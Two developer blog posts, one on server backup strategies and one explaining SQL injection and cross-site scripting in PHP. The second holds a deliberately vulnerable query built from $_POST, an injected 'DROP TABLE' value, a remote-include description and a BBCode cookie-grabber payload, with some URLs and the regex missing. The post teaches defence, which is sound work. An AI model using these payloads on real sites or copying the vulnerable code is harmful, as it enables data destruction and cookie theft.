Categories Tags


Lots of times when I talk to site owners, one of my first question that I ask them is "what is your backup strategy?"  And shockingly enough I've seen so many with strategies that would make me not want to sleep at night.

I've seen people who are so sure in their code that they decide that they don't actually need to make backups.  Which just tells me how immature they are.  They really think the only thing that could affect their code's well-being is the code itself?  How about the thing that it runs on (i.e. the server)?  They crash from time to time and you lose data.

The next "backup strategy" that I've seen is people use cPanel or some other tool in order to make a local backup of the site and just leave it there.  That's great if your database gets hacked or messed upend you have to revert it. However, what happens if your server goes into an unrecoverable state?  Well then, you are out of luck because you put all of your eggs in one basket.  The funny thing is, sometimes these peoples backup requires them to manually go in and click a button.  I personally would at least look for a somewhat automated approach to doing this because the last thing you would want to do is have to revert your site's content back 1-2 months because you "forgot to take a backup".

Now that we have gone through two of the most common backup "strategies" that I have seen, let me talk about some that I would prefer to see people having.


  • Source Control - in this day in age there really isn't a reason why your code couldn't be in source control.  You can choose the flavour that you would like (be it subversion, git, mercurial, etc), there are normally free services available for private source control repositories.  This means that repopulating your code is a simple "get/pull" command.
  • Offsite Backup - Normally fairly cheap to set up (assuming you know how), you can get a virtual private server (VPS) where you just "rsync" or "scp" data from one server to the other.  As long as this is in a different data centre than the main hosting service is, the likelihood of both going down is much lower.  Your recovery strategy would be copy the latest code back to your server and deploy the database.


  • Master/Slave Server - A master/slave server will allow for a constant syncing of your database between two servers.  The actual name varies depending on the platform however they all use the same concepts.  Every X minutes the slave server will poll the master server asking for any new/updated data which it then replays these changes on it's local database and everything.  Then if you are really paranoid (like I am), you could have a backup run off of the slave server every so often that way you have an extra copy of the complete database (which can be stored externally) and it doesn't impact the performance of your actual application.
  • Offsite Backup - Similar to code, a database backup is fairly easy to export and ship to another location.  It can all reside in a single file.   Zipping this up and secure copying it to another server will have yet again a bit more overhead when you are forced go into disaster recovery mode.  But, it will at least protect you in the unfortunate event of a server failure.

If you don't take much away from this article, there are two key points that I want you to take away.  

They are:

  • Servers fail, make sure you have a backup plan if your primary server goes down
  • Don't rely on someone remembering to take a backup of something.  Because it will be forgotten.  Set up some regular scheduled jobs to make your backups and lock them up in a safe facility for you.

I hope you found this informative!

Thanks for reading.

Posted in tools


I must first start this post with a comic on the topic ... it comes from

Exploits of a Mom

Anyways, this shows one of the many reasons why one should never trust any input from a user. This means that you should assume that all users have malicious intent and are attempting to break into your site. Of course, this is not always the case however, when it is, bad things can happen all around. No matter how you are getting data from the user, be it through an input field, URL, hidden field, drop down list etc. users are able to change the information to better suit their attacking desires. This means always make sure that the data is within the bounds of what is expected! What are some examples of bad things which can happen from the user of exploits? I have listed two of the more common threats which I see on a day-to-day basis.

  • SQL Injection - As portrayed in the comic from XKCD, if the correct security precautions are not in place, anything which is stored in your database can be eliminated within seconds or worse, modified in a manner you are not able to notice until it's too late. For example, if one is working on a website which has a built-in 'karma' system where the higher 'karma' a user has, the more things they are allowed to do on the site. If the website allows for SQL injection (accidentally of course), what is to stop the user from slowly increasing their 'karma' at a gradual rate until they have increased it so much that they are now in a new 'karma' category. Would this be noticeable? Probably not. Either way, if the user attacker truncates or deletes your tables, or even updates their records a bit to get more out of the site than they have achieved, these are all bad things which could happen ... and can easily be prevented by becoming aware of what is going on around you.
  • Cross Site Scripting (XSS) - Security flaws unintentional coded into applications which will allow the user to inject special code onto a site which can be extremely detrimental to any site. A simple example of XSS would be a cookie grabber. A fair number of the cookie grabbers I have seen come from the use of BBCode and the lack of proper validation for it. The theory behind a simple cookie grabber is that it will use any pre-existing javascript on the site (or use it's own) in order to send site-specific information to a different source. However, cookie grabbers are not the only problems from XSS. If the correct precautions are not in place the use of PHP's "include" or "require" function can have your site acting as a portal through the internet for anybody to use as they please. Similar to SQL injection, this can be prevented with the proper knowledge.


SQL Injection Just say you have a form where you allow the user to select how many records they want to display:

<form method = "post" action = "results.php">
How many records should be displayed?
  <select type = 'text' name = 'count'>
    <option value = '5'>5</option>
    <option value = '10'>10</option>
    <option value = '15'>15</option>
  <input type = 'submit' />

And the back end of your application looks something like this:

    $query = "SELECT * FROM `news` LIMIT " . $_POST["count"];
    $res = mysql_query($query);

What is to stop the user from modifying one of the values in the drop down list to:

5; DROP TABLE `news`;

Nothing! However, if you don't prevent such a thing from being allowed in your query (i.e. not doing enough data validation), after the user runs that query, your entire 'news' table will be dropped from the system, which was probably not what was originally intended for the script. I have mentioned this method of prevention before, and I'll mention it again, SQL prepared statements. If data is sent in as a parameter rather than as a direct part of the query, there are no chances that the query may be mistaken and have two queries execute instead of one. Cross Site Scripting (XSS) These security vulnerabilities can be fairly hard to track down, however there is always a way. Simple XSS Just say you have your URLs as something like this: Where in your actual PHP script you have a server side include for whatever value was passed in through $_GET. Well, this is opening up an entirely new can of worms. Yes it works for pages which are on your server, however, it will also work for sites which are off site if you are not careful in your validation. Sample Code:

// This is a VERY bad idea, however it is only an example

If I were to change the URL from: To: By default, PHP will not think anything of it. It will treat the website as a file stream just as it does the 'temp.php' which was originally passed in. And low and behold, somebody is now using your site to access Google. Lesson: validate and verify that the file exists LOCALLY before running the include. Cookie Grabber Since cookies are only accessible on the site which they are associated with, cookie grabbers must use this in order to get the information they need. A fair number of implementations of BBCode which I have seen have allowed for gaping holes because of this. For example, most implementations use regular expressions in order to pick up on the required information (which is what they should be used for). However, since urls and things can have a large number of characters, most programmers choose to use the greedy approach and use the 'anything but newline character' (the period). Regex (something similar to this, as I cannot remember the exact regular expression):


This regular expression will then be replaced in the emitted HTML code to be:

<img alt="" src="$1" />

This is all fine and dandy, and it picks up what is required however, it also has the ability to pick up more than expected and/or desired. For example, if the following was provided it would allow the user to gain access to the cookies which are for a particular site.

[img=" onclick="document.location.href=''+document.cookie]

This has the potential for changing the emitted HTML into becoming:

<img alt="" src="" />

Effectively causing your web browser to relocate to a different URL with your cookie in the link which they will then log for future use. Of course, if a little extra time was spent in the sanitation of the input problems like this can be filtered out.

Summary: In summary, never ever ever trust user's input. It will only lead you towards worlds of pain. Hope this helps!

Posted in php